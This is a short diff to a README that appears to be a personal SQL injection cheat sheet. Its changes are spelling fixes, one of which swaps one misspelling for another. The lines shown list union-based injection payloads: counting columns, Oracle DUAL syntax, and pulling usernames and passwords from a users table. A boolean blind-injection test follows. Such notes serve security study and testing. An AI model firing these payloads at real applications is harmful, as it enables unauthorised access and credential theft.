xasyhack/xasyhack.github.io/README.md

 **In-band: Union-Based Injection**
 - Determine the number of columns required: `' ORDER BY 1--`  OR `' UNION SELECT NULL,NULL--`
-- Oracle specific syntaxt: `' UNION SELECT NULL FROM DUAL--`
+- Oracle specific syntext: `' UNION SELECT NULL FROM DUAL--`
-- Retrieve othe records: `' UNION SELECT 1, username, password FROM users --`
+- Retrieve other records: `' UNION SELECT 1, username, password FROM users --`

 **Blind: Boolean-based Injection**
 - `' AND '1'='1` (Return results)